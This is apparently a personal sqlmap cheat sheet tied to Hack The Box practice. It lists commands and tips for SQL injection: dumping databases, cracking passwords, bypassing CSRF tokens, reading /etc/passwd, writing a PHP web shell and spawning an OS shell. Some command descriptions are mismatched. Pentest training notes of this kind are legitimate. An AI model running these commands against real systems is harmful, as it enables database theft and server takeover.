SQLmap

CommandDescription
sqlmap -r email.request --level 5 --risk 3 --batch --dump -p --dbs --threads 10 --technique=BEUbasic usage
sqlmap 'https://admin-portal.europacorp.htb/login.php' --data 'email=nika@nika.com&password=nika' --level 5 --risk 3 --batch --dump -p email --dbs --threads 10 --technique=BEUPOST request specifying an injection point with an asterisk
sqlmap --force-sslView the basic help menu
sqlmap -hhForce SSL when https
sqlmap -u "http://www.example.com/vuln.php?id=1" --batchRun SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'SQLMap with POST request
sqlmap -r req.txtPassing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUTSpecifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txtStore traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batchSpecify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dbaBasic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdbTable enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surnameTable/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schemaDatabase schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T userSearching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batchPassword enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"Anti-CSRF token bypass
sqlmap --list-tampersList all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dbaCheck for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shellSpawning an OS shell

Tips

  1. --no-cast: Avoids automatic data conversion, keeping it in its original format.
  2. -T <tablename>: Focuses on a specific table, useful for saving time when investigating a known table.
  3. -D: Sets the database name and helps reduce errors when you know the correct database.
  4. --titles: Bases SQL injection detection on page titles, useful when titles differentiate between true and false answers.
  5. --text-only: Ignores HTML tags, focusing only on the visible text of the answers.
  6. --string="success": Identifies true answers by the presence of a specific string, such as "success".
  7. --batch: Runs sqlmap automatically without manual interactions, ideal for scripts or quick use.
  8. --dump: Extracts data from tables after finding a vulnerability, showing the impact of SQL injection.
  9. --level=1-5: Increases the number and diversity of tests, including less common techniques for a more detailed scan.
  10. --risk=1-3: Expands the set of test vectors, including those with higher risks, for in-depth investigations.
  11. --fresh-queries: This parameter instructs sqlmap not to resume the previous session and to treat each execution as a new session.
  12. -v 3: Sets the verbosity level to display the payloads used, which helps understand which techniques are most effective.
  13. -p: Specifies the vulnerable parameter in the POST. Ex: -p id
  14. --tables: Shows the available tables in the database You need to specify -D <database>
  15. --start=2 --stop=3: You can define the beginning and end of the number of rows to be pulled.
  16. --dump-all: Use when you need to extract data from all tables in all databases. Ideal for a complete analysis, but can be time-consuming.
  17. --exclude-sysdbs: Use to ignore system databases. Good for focusing on specific application data and avoiding unnecessary security alerts.
  18. --where="<username> LIKE 'f%'": Use to filter extracted data with a specific WHERE condition. Useful for focusing on specific records and saving time.
  19. -C: Defines the specific column you want to search. 20. --search: Used to search for specific objects in the database, such as tables, columns, or even data within tables, based on provided search criteria. Ex: --search -T users -C password
  20. --schema: This command is used to obtain the database schema, which includes information about the tables, columns, data types, and potentially other schema properties.
  21. --random-agent: Some systems may block the sqlmap default user-agent. The --random-agent option chooses a random user-agent to bypass this block.
  22. --passwords: Used to attempt to retrieve the passwords of the target system's database users.
  23. --data: Only for the POST method. Provide the data in the format of key-value pairs, as in an HTML form. For example: --data="username=admin&password=secret".
  24. --technique=BEU: Limits testing to specific techniques. This allows you to focus on methods that are generally faster and less likely to cause significant disruptions to the target system.
  • B for Blind SQL Injection
  • E for Error-based SQL Injection
  • U for UNION query SQL Injection
  • T for Time-based Blind SQL Injection
  • S for Stacked query SQL Injection

Tags

sqlmap

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-11-02